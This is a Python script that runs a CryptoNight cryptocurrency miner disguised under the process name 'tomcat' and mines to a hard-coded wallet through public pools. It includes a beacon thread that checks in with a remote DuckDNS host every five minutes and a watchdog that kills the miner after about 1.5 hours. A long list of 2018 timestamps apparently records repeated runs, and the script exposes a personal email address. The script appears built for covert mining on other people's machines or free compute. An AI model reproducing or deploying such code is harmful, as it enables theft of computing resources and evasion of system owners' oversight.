import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:05:01.281070
#2018-02-17 16:51:01.638347
#2018-02-17 18:39:05.519235
#2018-02-17 20:27:03.764789
#2018-02-17 22:14:04.802869
#2018-02-17 23:58:05.140194
#2018-02-18 01:49:06.279066
#2018-02-18 03:36:07.630134
#2018-02-18 05:23:04.228703
#2018-02-18 07:14:03.997485
#2018-02-18 09:02:01.352773
#2018-02-18 10:49:04.342966
#2018-02-18 12:33:07.160004
#2018-02-18 14:20:06.441978
#2018-02-18 16:11:04.984098
#2018-02-18 17:59:07.076704
#2018-02-18 19:46:05.448074
#2018-02-18 21:33:06.638468
#2018-02-18 23:22:01.475452
#2018-02-19 01:09:03.665249
#2018-02-19 02:55:07.212258
#2018-02-19 04:42:07.200267
#2018-02-19 06:27:01.488739
#2018-02-19 08:17:05.919210
#2018-02-19 10:06:01.484430
#2018-02-19 11:54:09.193548
#2018-02-19 13:41:07.296906
#2018-02-19 15:29:07.657605
#2018-02-19 17:16:09.042849
#2018-02-19 19:04:08.506980
#2018-02-19 20:48:08.566900
#2018-02-19 22:37:01.814376
#2018-02-20 00:21:01.437353
#2018-02-20 02:09:04.280784
#2018-02-20 04:01:04.683579
#2018-02-20 05:44:08.673281
#2018-02-20 07:29:04.605941
#2018-02-20 09:13:05.420636
#2018-02-20 10:57:09.787817
#2018-02-20 12:46:09.016412
#2018-02-20 14:31:04.409965
#2018-02-20 16:15:09.192212
#2018-02-20 18:03:07.166786
#2018-02-20 19:55:10.648049
#2018-02-20 21:43:08.661489
#2018-02-20 23:24:04.473248
#2018-02-21 01:10:08.594865
#2018-02-21 02:58:01.776480
#2018-02-21 04:47:01.979090
#2018-02-21 06:36:04.519859
#2018-02-21 08:22:07.570089
#2018-02-21 10:08:05.682600
#2018-02-21 11:58:06.950129
#2018-02-21 13:48:10.253339
#2018-02-21 15:35:11.358899
#2018-02-21 17:27:11.268176
#2018-02-21 19:14:09.112058
#2018-02-21 21:02:08.486231
#2018-02-21 22:48:05.592648
#2018-02-22 00:38:06.365957
#2018-02-22 02:27:01.247423
#2018-02-22 04:13:07.847147
#2018-02-22 05:59:04.962345
#2018-02-22 07:46:01.459772
#2018-02-22 09:33:07.748648
#2018-02-22 11:19:06.748751
#2018-02-22 13:05:09.057716
#2018-02-22 14:52:10.280024
#2018-02-22 16:38:08.443457
#2018-02-22 18:23:06.378612
#2018-02-22 20:18:06.361707
#2018-02-22 22:04:01.483087
#2018-02-22 23:50:10.783953
#2018-02-23 01:39:06.756114
#2018-02-23 03:26:03.833478
#2018-02-23 05:13:07.024173
#2018-02-23 06:58:04.065734
#2018-02-23 08:47:07.709573
#2018-02-23 11:07:08.833767
#2018-02-23 13:01:01.493526
#2018-02-23 14:48:06.723974
#2018-02-23 16:37:04.633616
#2018-02-23 19:28:08.310256
#2018-02-23 21:13:07.455024
#2018-02-23 22:59:07.081376
#2018-02-24 00:47:04.559596
#2018-02-24 02:42:06.455201
#2018-02-24 05:29:01.331735
#2018-02-24 07:16:03.723218
#2018-02-24 09:05:01.736550
#2018-02-24 11:04:04.328467
#2018-02-24 12:52:04.605281
#2018-02-24 14:40:04.340364
#2018-02-24 16:31:07.614610
#2018-02-24 18:21:03.813205
#2018-02-24 20:07:06.275539
#2018-02-24 21:52:06.304524
#2018-02-25 00:52:07.353690
#2018-02-25 04:46:03.901240
#2018-02-25 09:03:01.943239